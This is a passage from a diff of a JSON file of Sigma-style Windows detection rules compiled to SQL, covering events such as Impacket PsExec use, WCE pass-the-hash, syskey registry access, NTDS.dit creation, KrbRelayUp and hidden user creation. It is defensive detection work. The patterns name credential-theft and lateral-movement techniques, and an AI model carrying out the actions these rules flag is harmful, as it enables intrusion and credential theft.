OR TargetFilename LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dwm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventcreate.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\explorer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fontdrvhost.exe' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\ipconfig.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicli.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicpl.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\logman.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msinfo32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powershell.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regini.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthService.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\services.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ShellAppRuntime.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sihost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\svchost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Taskmgr.exe' ESCAPE 
'\\' OR TargetFilename LIKE '%\\\\TiWorker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFaultSecure.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wininit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinRTNetMUAHostServer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wslhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSReset.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WUDFHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WWAHost.exe' ESCAPE '\\') AND NOT (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR TargetFilename LIKE '\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\Windows\\\\System32\\\\dism.exe' ESCAPE '\\' OR Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\system32\\\\wbengine.exe' ESCAPE '\\') OR (Image LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\bcdedit.exe' ESCAPE '\\')) OR (Image LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:Program Files\\\\WindowsApps\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\SecurityHealth\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' AND Image LIKE '%\\\\SecurityHealthSetup.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ObjectType = 'key' AND (ObjectName LIKE '%lsa\\\\JD' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\GBG' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Skew1' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Data' ESCAPE '\\'))" ], - "filename": "file_event_win_creation_system_file.yml" + "filename": "win_security_syskey_registry_access.yml" }, { - "title": "Potential Privilege Escalation Attempt Via .Exe.Local Technique", - "id": "07a99744-56ac-40d2-97b7-2095967b0e03", - "status": "experimental", - "description": "Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)", + "title": "Impacket PsExec Execution", + "id": "32d56ea1-417f-44ff-822b-882873f5f43b", + "status": "test", + "description": "Detects execution of Impacket's psexec.py.", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wermgr.exe.local%' ESCAPE '\\') AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%RemCom\\_stdin%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stdout%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stderr%' ESCAPE '\\'))" ], - "filename": "file_event_win_system32_local_folder_privilege_escalation.yml" + "filename": "win_security_impacket_psexec.yml" }, { - "title": "TeamViewer Remote Session", - "id": "162ab1e4-6874-4564-853c-53ec3ab8be01", + "title": "WCE wceaux.dll Access", + "id": "1de68c67-af5c-4097-9c85-fe5578e09e67", "status": "test", - "description": "Detects the creation of log files during a TeamViewer remote session", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "falsepositives": [ - "Legitimate uses of TeamViewer in an organisation" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\TeamViewer\\\\RemotePrinting\\\\tvprint.db' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TeamViewer\\\\TVNetwork.log' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\TeamViewer%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Logfile.log%' ESCAPE '\\')))" - ], - "filename": "file_event_win_susp_teamviewer_remote_session.yml" - }, - { - "title": "Creation Of Non-Existent System DLL", - "id": 
"df6ecb8b-7822-4f4b-b412-08f524b4576c", - "status": "experimental", - "description": "Detects the creation of system dlls that are not present on the system. Usually to achieve dll hijacking", - "author": "Nasreddine Bencherchali (Nextron Systems), fornotes", + "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.credential_access", + "attack.t1003", + "attack.s0005" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') OR TargetFilename LIKE '%\\\\SprintCSP.dll' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4658', '4660', '4663') AND ObjectName LIKE '%\\\\wceaux.dll' ESCAPE '\\')" ], - "filename": "file_event_win_create_non_existent_dlls.yml" + "filename": "win_security_mal_wceaux_dll.yml" }, { - "title": "Creation of an WerFault.exe in Unusual Folder", - "id": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", - "status": "experimental", - "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", - "author": "frack113", + "title": "Hidden Local User Creation", + "id": 
"7b449a5e-1db5-4dd0-a2dc-4e3a67282538", + "status": "test", + "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001" + "attack.t1136.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wer.dll' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND TargetUserName LIKE '%$' ESCAPE '\\')" ], - "filename": "file_event_win_werfault_dll_hijacking.yml" + "filename": "win_security_hidden_user_creation.yml" }, { - "title": "Potential RipZip Attack on Startup Folder", - "id": "a6976974-ea6f-4e97-818e-ea08625c52cb", + "title": "Account Tampering - Suspicious Failed Logon Reasons", + "id": "9eb99343-d336-4020-a3cd-67f3819e68ee", "status": "experimental", - "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\nIf the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\nAdditionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.\n", - "author": "Greg (rule)", + "description": "This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.", + "author": "Florian Roth (Nextron Systems)", "tags": [ 
"attack.persistence", - "attack.t1547" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.initial_access", + "attack.t1078" ], "falsepositives": [ - "Unknown" + "User using a disabled account" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}%' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4625', '4776') AND Status IN ('0xC0000072', '0xC000006F', '0xC0000070', '0xC0000413', '0xC000018C', '0xC000015B')) AND NOT (SubjectUserSid = 'S-1-0-0'))" ], - "filename": "file_event_win_ripzip_attack.yml" + "filename": "win_security_susp_failed_logon_reasons.yml" }, { - "title": "Potential Startup Shortcut Persistence Via PowerShell.EXE", - "id": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", + "title": "Suspicious Scheduled Task Creation", + "id": "3a734d25-df5c-4b99-8034-af1ddb5883a4", "status": "experimental", - "description": "Detects PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", - "author": "Christopher Peacock '@securepeacock', SCYTHE", + "description": "Detects suspicious scheduled task creation events. 
Based on attributes such as paths, commands line flags, etc.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.privilege_escalation", "attack.persistence", - "attack.t1547.001" + "attack.t1053.005" ], "falsepositives": [ - "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\start menu\\\\programs\\\\startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND (TaskContent LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContent LIKE '%regsvr32%' ESCAPE '\\' OR TaskContent LIKE '%rundll32%' ESCAPE '\\' OR TaskContent LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContent LIKE '%cmd%' ESCAPE '\\' OR TaskContent LIKE '%/c %' ESCAPE '\\' OR TaskContent LIKE '%/k %' ESCAPE '\\' OR TaskContent LIKE '%/r %' ESCAPE '\\' OR TaskContent LIKE '%powershell%' ESCAPE '\\' OR TaskContent LIKE '%pwsh%' ESCAPE '\\' OR TaskContent LIKE '%mshta%' ESCAPE '\\' OR TaskContent LIKE '%wscript%' ESCAPE '\\' OR TaskContent LIKE '%cscript%' ESCAPE '\\' OR TaskContent LIKE '%certutil%' ESCAPE '\\' OR 
TaskContent LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContent LIKE '%bash.exe%' ESCAPE '\\' OR TaskContent LIKE '%bash %' ESCAPE '\\' OR TaskContent LIKE '%scrcons%' ESCAPE '\\' OR TaskContent LIKE '%wmic %' ESCAPE '\\' OR TaskContent LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContent LIKE '%forfiles%' ESCAPE '\\' OR TaskContent LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContent LIKE '%hh.exe%' ESCAPE '\\'))" ], - "filename": "file_event_win_powershell_startup_shortcuts.yml" + "filename": "win_security_susp_scheduled_task_creation.yml" }, { - "title": "ISO File Created Within Temp Folders", - "id": "2f9356ae-bf43-41b8-b858-4496d83b2acb", - "status": "experimental", - "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.", - "author": "@sam0x90", + "title": "Operation Wocao Activity - Security", + "id": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", + "status": "test", + "description": "Detects activity mentioned in Operation Wocao report", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.discovery", + "attack.t1012", + "attack.defense_evasion", + "attack.t1036.004", + "attack.t1027", + "attack.execution", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" + "Administrators that use checkadmin.exe tool to enumerate local administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.zip\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\Content.Outlook\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\')))" + "SELECT * FROM logs WHERE 
(Channel = 'Security' AND EventID = '4799' AND TargetUserName LIKE 'Administr%' ESCAPE '\\' AND CallerProcessName LIKE '%\\\\checkadmin.exe' ESCAPE '\\')" ], - "filename": "file_event_win_iso_file_mount.yml" + "filename": "win_security_apt_wocao.yml" }, { - "title": "Suspicious MSExchangeMailboxReplication ASPX Write", - "id": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", + "title": "Suspicious Computer Account Name Change CVE-2021-42287", + "id": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", "status": "test", - "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", + "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.persistence", - "attack.t1505.003" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\MSExchangeMailboxReplication.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4781' AND OldTargetUserName LIKE '%$%' ESCAPE '\\') AND NOT (NewTargetUserName LIKE '%$%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_exchange_aspx_write.yml" + "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml" }, { - "title": "UAC Bypass Using Windows Media Player - File", - "id": "68578b43-65df-4f81-9a9b-92f32711a951", - "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Service Installed By Unusual Client - Security", + "id": 
"c4e92a97-a9ff-4392-9d2d-7a4c642768ca", + "status": "experimental", + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "author": "Tim Rauch", "tags": [ - "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OskSupport.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ClientProcessId = '0' OR ParentProcessId = '0'))" ], - "filename": "file_event_win_uac_bypass_wmp.yml" + "filename": "win_security_service_installation_by_unusal_client.yml" }, { - "title": "Suspicious NTDS.DIT Creation", - "id": "4e7050dd-e548-483f-b7d6-527ab4fa784d", - "status": "test", - "description": "Detects suspicious creations of a file named \"ntds.dit\" (Active Directory Database) by suspicious parent process, directory or a suspicious one liner", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation Via Use Clip - Security", + "id": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND ((ParentImage 
LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\apache%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%(Clipboard|i%' ESCAPE '\\')" ], - "filename": "file_event_win_ntds_dit.yml" + "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml" }, { - "title": "NPPSpy Hacktool Usage", - "id": "cad1fe90-2406-44dc-bd03-59d0b58fe722", - "status": "test", - "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", - "author": "Florian Roth (Nextron Systems)", + "title": "KrbRelayUp Attack Pattern", + "id": "749c9f5e-b353-4b90-a9c1-05243357ca4b", + "status": "experimental", + "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", + "author": "@SBousseaden, Florian Roth", "tags": [ + "attack.privilege_escalation", "attack.credential_access" ], "falsepositives": [ 
@@ -36910,1242 +36932,1220 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\NPPSpy.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NPPSpy.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND AuthenticationPackageName = 'Kerberos' AND IpAddress = '127.0.0.1' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND TargetUserSid LIKE '%-500' ESCAPE '\\')" ], - "filename": "file_event_win_hktl_nppspy.yml" + "filename": "win_security_susp_krbrelayup.yml" }, { - "title": "New Outlook Macro Created", - "id": "8c31f563-f9a7-450c-bfa8-35f8f32f1f61", + "title": "Suspicious PsExec Execution", + "id": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", "status": "test", - "description": "Detects the creation of a macro file for Outlook.", - "author": "@ScoubiMtl", + "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", + "author": "Samir Bousseaden", "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "User genuinely creates a VB Macro for their email" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%-stdin' ESCAPE '\\' OR RelativeTargetName LIKE '%-stdout' ESCAPE '\\' OR RelativeTargetName LIKE '%-stderr' ESCAPE 
'\\')) AND NOT (RelativeTargetName LIKE 'PSEXESVC%' ESCAPE '\\'))" ], - "filename": "file_event_win_office_outlook_macro_creation.yml" + "filename": "win_security_susp_psexec.yml" }, { - "title": "VsCode Powershell Profile Modification", - "id": "3a9fa2ec-30bc-4ebd-b49e-7c9cff225502", - "status": "experimental", - "description": "Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "AD User Enumeration", + "id": "ab6bffca-beff-4baa-af11-6733f296d57a", + "status": "test", + "description": "Detects access to a domain user from a non-machine account", + "author": "Maxime Thiebaut (@0xThiebaut)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.013" + "attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - "Legitimate use of the profile by developers or administrators" + "Administrators configuring new users." 
